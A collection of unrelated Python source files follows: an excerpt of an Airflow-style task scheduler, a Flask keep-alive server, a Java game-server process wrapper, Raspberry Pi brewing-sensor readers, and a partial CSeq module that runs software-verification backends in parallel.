Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
path = simple_dag.full_filepath
if path.startswith(settings.DAGS_FOLDER):
path = path.replace(settings.DAGS_FOLDER, "DAGS_FOLDER", 1)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=path,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance.queued_dttm = None
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: list[airflow.models.DAG]
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if conf.getboolean('core', 'CHECK_SLAS', fallback=True):
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Running execute loop for %s seconds", self.run_duration)
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
type(self)._create_dag_file_processor,
processor_timeout,
self.dag_ids,
pickle_dags,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(file_path, zombies, dag_ids, pickle_dags):
"""
Creates DagFileProcessorProcess instance.
"""
return DagFileProcessor(file_path,
pickle_dags,
dag_ids,
zombies)
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while (timezone.utcnow() - execute_start_time).total_seconds() < \
self.run_duration or self.run_duration < 0:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self._get_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if len(simple_dags) > 0:
try:
simple_dag_bag = SimpleDagBag(simple_dags)
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
scheduled_dag_ids = ", ".join(simple_dag_bag.dag_ids)
self.log.info('DAGs to be executed: {}'.format(scheduled_dag_ids))
# TODO(CX-17516): State.QUEUED has been added here which is a hack as the Celery
# Executor does not reliably enqueue tasks with the my MySQL broker, and we have
# seen tasks hang after they get queued. The effect of this hack is queued tasks
# will constantly be requeued and resent to the executor (Celery).
# This should be removed when we switch away from the MySQL Celery backend.
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED, State.QUEUED))
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
continue
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.log.info("Terminating DAG processors")
self.processor_agent.terminate()
self.log.info("All DAG processors terminated")
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: list[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = models.DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
ti.start_date = ti.end_date = timezone.utcnow()
ti.duration = 0
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "BOT IS ONLINE <br> SOURCE CODE BY https://github.com/staciax"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
wrapper.py
|
import os
import subprocess
import sys
from threading import Thread
from queue import Queue, Empty
# https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
class server:
def __init__(self, server_dir=os.path.join(os.getcwd(), "server")):
self.server_dir = server_dir
self.queue = Queue()
self.thread = Thread()
self.ON_POSIX = 'posix' in sys.builtin_module_names
self.server_output = []
def _queue(self, stdout, queue):
for line in iter(stdout.readline, b''):
queue.put(line)
self.server_output.append(line.replace("\n", ""))
stdout.close()
def start(self, wait_for_server=True, nogui=False):
startup_cmd = "java -jar spinel_server.jar"
if nogui:
startup_cmd += " --nogui"
self.pipe = subprocess.Popen(startup_cmd, cwd=self.server_dir, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True, text=True, bufsize=1, close_fds=self.ON_POSIX)
self.thread = Thread(target=self._queue, args=(self.pipe.stdout, self.queue))
self.thread.daemon = True
self.thread.start()
if wait_for_server:
server_up = False
# Wait for the server to startup by checking for the "help" message
while not server_up:
for line in self.server_output:
if "For help, type \"help\"" in line:
server_up = True
def latest_message(self):
try:
return message(self.queue.get_nowait().replace("\n", ""))
except Empty:
pass
def write(self, msg):
self.pipe.stdin.write(msg + "\n")
class message:
def __init__(self, message):
self.raw = message
self.author = ""
self.content = ""
try:
# checks if the message has a valid author (prevents things like commands from registering as chat)
if message.split(" ")[3].startswith("<") and message.split(" ")[3].endswith(">"):
self.content = message.split(" ")[4:]
self.content = " ".join(self.content)
self.author = message.split(" ")[3].replace(">", "").replace("<", "")
except IndexError:
pass
def __str__(self):
return self.raw
|
brewSensor.py
|
import bme680
import adafruit_dht
import board
import threading
import time
from logger import logger
class BrewSensor():
def __init__(self, location, interval=2):
self.location = location
self.interval = interval
@staticmethod
def getSensorByItsLocation(sensors, location):
return next(( sensor for sensor in sensors if sensor.location == location), None)
class DHT11Sensor(BrewSensor):
def __init__(self, pin, location, interval):
super().__init__(location, interval)
self.pin = pin
self.sensor = adafruit_dht.DHT11(board.D17)
@property
def temp(self):
try:
return self.sensor.temperature
except RuntimeError as error:
timeout = 2
telemetry = {
'location': self.location,
'error': str(error),
'exception': error.__class__.__name__
}
logger.error('DHT sensor got invalid checksum, trying again in {} seconds.'.format(timeout), es=telemetry)
time.sleep(timeout)
return self.temp
@property
def humidity(self):
return self.sensor.humidity
def logReadings(self):
telemetry = {
'temperature': self.temp,
'humidity': self.humidity,
'location': self.location
}
logger.info("Sensor readings", es=telemetry)
return
def spawnBackgroundSensorLog(self):
thread = threading.Thread(target=self.logSensorOnIntervalForever, args=())
thread.daemon = True
thread.start()
logger.info("spawned background sensor {} log at interval: {}".format(self.location, self.interval))
def logSensorOnIntervalForever(self):
while True:
try:
self.logReadings()
except Exception as error:
logger.error('Sensor log daemon failed, sleeping and trying again', es={
'location': self.location,
'error': str(error),
'exception': error.__class__.__name__
})
time.sleep(2)
time.sleep(self.interval)
@staticmethod
def fromYaml(loader, node):
return DHT11Sensor(**loader.construct_mapping(node))
class BME680Sensor(BrewSensor):
def __init__(self, location, interval):
super().__init__(location, interval)
self.setupSensors()
self.lastSensorRead = time.time()
def setupSensors(self):
try:
self.sensor = bme680.BME680()
self.sensor.set_humidity_oversample(bme680.OS_2X)
self.sensor.set_pressure_oversample(bme680.OS_4X)
self.sensor.set_temperature_oversample(bme680.OS_8X)
self.sensor.set_filter(bme680.FILTER_SIZE_3)
self.sensor.set_gas_status(bme680.ENABLE_GAS_MEAS)
self.sensor.set_gas_heater_temperature(320)
self.sensor.set_gas_heater_duration(150)
self.sensor.select_gas_heater_profile(0)
except RuntimeError as error:
logger.error('Sensor not found!', es={
'location': self.location,
'error': str(error),
'exception': error.__class__.__name__
})
def read(self):
self.lastSensorRead = time.time()
return self.sensor.get_sensor_data()
def logReadings(self, detailed):
if self.needToUpdateReadings:
self.read()
telemetry = {
'temperature': self.temp,
'pressure': self.pressure,
'humidity': self.humidity,
'location': self.location
}
if detailed:
telemetry['gasResistance'] = self.gasResistance
telemetry['stableHeat'] = self.stableHeat
logger.info("Sensor readings", es=telemetry)
return
def saveToFile(self, filename):
with open(filename, "w") as file:
file.write("{}".format(self.temp))
def spawnBackgroundSensorLog(self):
thread = threading.Thread(target=self.logSensorOnIntervalForever, args=())
thread.daemon = True
thread.start()
logger.info("spawned background sensor {} log at interval: {}".format(self.location, self.interval))
def logSensorOnIntervalForever(self):
while True:
try:
self.logReadings(detailed=True)
except Exception as error:
logger.error('Sensor log daemon failed, sleeping and trying again', es={
'location': self.location,
'error': str(error),
'exception': error.__class__.__name__
})
time.sleep(2)
time.sleep(self.interval)
@property
def needToUpdateReadings(self):
return time.time() - self.lastSensorRead > 1
@property
def temp(self):
if self.needToUpdateReadings:
self.read()
return self.sensor.data.temperature
@property
def pressure(self):
if self.needToUpdateReadings:
self.read()
return self.sensor.data.pressure
@property
def humidity(self):
if self.needToUpdateReadings:
self.read()
return self.sensor.data.humidity
@property
def gasResistance(self):
if self.needToUpdateReadings:
self.read()
return self.sensor.data.gas_resistance
@property
def stableHeat(self):
if self.needToUpdateReadings:
self.read()
return self.sensor.data.heat_stable
@staticmethod
def fromYaml(loader, node):
return BME680Sensor(**loader.construct_mapping(node))
def __repr__(self):
return "{0:.2f} C,{1:.2f} hPa,{2:.2f} %RH".format(self.temp, self.pressure, self.humidity)
if __name__ == '__main__':
# brewSensor = DHT11Sensor(13, 'outside', 30)
brewSensor = BME680Sensor('inside', 2)
while True:
print(brewSensor.temp)
time.sleep(1)
|
labs_feeder_parallel.py
|
""" CSeq C Sequentialization Framework
parallel backend feeder module:
spanws multiple processes to invoke the backend using different options
written by Omar Inverso.
"""
VERSION = 'labs-feeder_parallel-2018.10.23'
# VERSION = 'labs-feeder_parallel-2018.05.31'
#VERSION = 'feeder_parallel-2018.05.25'
#VERSION = 'feeder_parallel-2018.04.22'
#VERSION = 'feeder-2015.07.16' # CSeq 1.0 Release - ASE2015
"""
Prerequisites:
Input correctly instrumented for the specified backend.
TODO:
- handle keyboard interrupts silently
- when the backend is not available, there should be an exception.
Changelog:
2018.05.31 forked from feeder_parallel for sequentialised programs (feeder_parallel-2018.05.25)
"""
import os, sys, getopt, time, signal, subprocess, shlex
from collections import Counter
#from multiprocessing import Process, Lock, Array
import multiprocessing
import pycparser.c_parser, pycparser.c_ast, pycparser.c_generator
import core.module, core.parser, core.utils
from core.module import ModuleError
from utils import findpropositionalvar, findpropositionalvarsize, get_bin
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Options and Parameters below.
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Name of the executable file to run, by backend.
backendFilename = {}
backendFilename['esbmc'] = 'esbmc'
backendFilename['cbmc-assumptions'] = '../cbmc/cbmc-simulator'
backendFilename['llbmc'] = 'llbmc'
backendFilename['blitz'] = 'blitz'
backendFilename['satabs'] = 'satabs'
# backendFilename['2ls'] = 'summarizer'
# backendFilename['smack'] = 'smack-verify.py'
backendFilename['klee'] = 'klee'
backendFilename['cpachecker'] = 'cpa.sh'
# backendFilename['spin'] = 'spin'
# Command-line parameters, by backend.
cmdoptions = {}
cmdoptions['esbmc'] = ' --no-slice --no-bounds-check --no-div-by-zero-check --no-pointer-check --unwind 1 --no-unwinding-assertions '
cmdoptions['cbmc-assumptions'] = ' ' ###cmdoptions['cbmc'] = ' --bounds-check '
###cmdoptions['cbmc'] = ' --unwind 1 --no-unwinding-assertions '
cmdoptions['llbmc'] = ' -no-max-function-call-depth-checks -no-memory-free-checks -no-shift-checks -no-memcpy-disjoint-checks -no-memory-access-checks -no-memory-allocation-checks --max-loop-iterations=1 --no-max-loop-iterations-checks --ignore-missing-function-bodies -no-overflow-checks -no-div-by-zero-checks'
cmdoptions['blitz'] = ' --terminate-on-firstbug '
cmdoptions['satabs'] = ' '
# cmdoptions['2ls'] = ' '
# cmdoptions['smack'] = ' --unroll 1 '
cmdoptions['klee'] = ' -exit-on-error '
cmdoptions['cpachecker'] = ' -preprocess -heap 15000M -timelimit 86400 -noout -predicateAnalysis '
# Command-line parameters, by backend - when no sequentialisation is performed.
cmdoptionsNOSEQ = {}
cmdoptionsNOSEQ['esbmc'] = ' --no-slice --no-bounds-check --no-div-by-zero-check --no-pointer-check '
cmdoptionsNOSEQ['cbmc-assumptions'] = ' '
cmdoptionsNOSEQ['llbmc'] = ' -no-max-function-call-depth-checks -no-memory-free-checks -no-shift-checks -no-memcpy-disjoint-checks -no-memory-access-checks -no-memory-allocation-checks --ignore-missing-function-bodies -no-overflow-checks -no-div-by-zero-checks '
# cmdoptionsNOSEQ['blitz'] = ' --terminate-on-firstbug ' # No support concurrency
cmdoptionsNOSEQ['satabs'] = ' '
# cmdoptionsNOSEQ['2ls'] = ' ' # no concurrency support
# cmdoptionsNOSEQ['smack'] = ' '
cmdoptionsNOSEQ['klee'] = ' '
# cmdoptionsNOSEQ['cpachecker'] = ' -preprocess -heap 15000M -timelimit 86400 -noout -predicateAnalysis ' # No support concurrency
class labs_feeder_parallel(core.module.BasicModule):
verbose = False
def init(self):
self.addInputParam('backend', 'backend (blitz, cbmc, esbmc, llbmc, cpachecker, satabs, klee)', 'b', 'cbmc-assumptions', False)
self.addInputParam('time', 'analysis time limit (in seconds)', 't', '3600000', False)
self.addInputParam('depth', 'limit search depth', 'd', '0', False) # depth parameter for the competition
self.addInputParam('extrargs', 'extra arguments to use for parallel analysis (one per core)', 'x', [], False)
self.addInputParam('simulate', '0 for verification mode; otherwise # of traces to generate', 't', '0', optional=True) # TODO
self.addInputParam('info', 'LAbS system information', 'i', None, False)
self.addOutputParam('exitcode')
def loadfromstring(self, string, env):
extrargs = []
simulate = 0
cores = None
if self.getInputParamValue('extrargs') is not None:
extrargs = self.getInputParamValue('extrargs')
cores = len(extrargs)
if cores == 0 or cores is None: cores = 1
if self.getInputParamValue('show') is not None:
self.output = string
return
if self.getInputParamValue('simulate') is not None:
simulate = int(self.getInputParamValue('simulate'))
if simulate:
cores = 16
if cores > 1: print "Parallel analysis using %s cores" % cores
else: print "No parallel analysis"
depth = int(self.getInputParamValue('depth'))
timelimit = self.getInputParamValue('time')
backend = self.getInputParamValue('backend')
backendparams = self.getInputParamValue('backendparams')
witness = self.getInputParamValue('witness')
info = self.getInputParamValue('info')
''' Run the verification tool on the input file '''
seqfile = core.utils.rreplace(env.inputfile, '/', '/_cs_', 1) if '/' in env.inputfile else '_cs_' + env.inputfile
logfile = seqfile + '.' + backend + '.log' if witness is None else witness
core.utils.saveFile(seqfile, string)
if backend == 'esbmc':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
if depth != 0:
cmd += ' --depth %s ' % str(depth)
elif backend == 'cbmc-assumptions':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
if depth != 0:
cmd += ' --depth %s ' % str(depth)
elif backend == 'llbmc':
# llbmc and clang need to be matched
clangpath = '' if self.getInputParamValue('llvm') is None else self.getInputParamValue('llvm')
clangexe = clangpath +'clang'
cmd = "%s -c -g -I. -emit-llvm %s -o %s.bc 2> %s " % (clangexe, seqfile, seqfile[:-2], logfile)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
core.utils.saveFile('clang_stdout.log', out)
core.utils.saveFile('clang_stderr.log', err)
cmd = backendFilename[backend] + ' ' + cmdoptions[backend] + ' ' + seqfile[:-2] + '.bc'
elif backend == 'blitz':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
if depth != 0:
cmd += ' --depth %s ' % str(depth)
elif backend == 'satabs':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
elif backend == '2ls':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
elif backend == 'klee': # klee needs llvm-gcc version 2.9
clangpath = '' if self.getInputParamValue('llvm') is None else self.getInputParamValue('llvm')
clangexe = clangpath + 'llvm-gcc'
cmd = "%s -c -g -emit-llvm %s -o %s.bc " % (clangexe, seqfile, seqfile[:-2])
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
core.utils.saveFile('clang_stdout.log', out)
core.utils.saveFile('clang_stderr.log', err)
cmd = backendFilename[backend] + ' ' + cmdoptions[backend] + ' ' + seqfile[:-2] + '.bc'
elif backend == 'cpachecker':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
elif backend == 'smack':
cmd = backendFilename[backend] + cmdoptions[backend] + seqfile
#try:
if simulate == 0:
processes = []
lock = multiprocessing.Lock()
#cores = 4 # multiprocessing.cpu_count()
# thread-safe shared vectors of
# process identifiers, process exit codes, and spawned processes' identifiers
# every process fills in its own entries
pool = multiprocessing.Array('i', [-1 for i in range(cores)]) # -1=not started, 0=terminated
code = multiprocessing.Array('i', [-1 for i in range(cores)]) # return codes
boh = multiprocessing.Array('i', [-1 for i in range(cores)]) # child processes PIDs
pipea,pipeb = multiprocessing.Pipe()
starttime = time.time()
if cores == 1:
args = "" if len(extrargs) == 0 else extrargs[0]
p = multiprocessing.Process(target=self.feed, args=(0,cores, cmd+' '+args,timelimit,backend,logfile, pool,code,boh, lock,pipeb, starttime))
processes.append(p)
p.start()
else:
for k in range(0,cores):
p = multiprocessing.Process(target=self.feed, args=(k,cores, cmd+' '+extrargs[k],timelimit,backend,logfile, pool,code,boh, lock,pipeb, starttime))
processes.append(p)
p.start()
# in any case,
# only one of the processes' output will make it to this point: either
# the first process that finds an error trace (or crashes), or
# the last one to terminate (or time out) without finding anything.
self.output = pipea.recv()
#print self.output
core.utils.saveFile(logfile,self.output)
# wait for all processes to terminate,
# if one of them finds the error will terminate all the others
for p in processes:
p.join()
else:
## Simulation mode ##
p = multiprocessing.Pool(cores)
with open(seqfile+".map") as f:
self.lines = f.readlines()
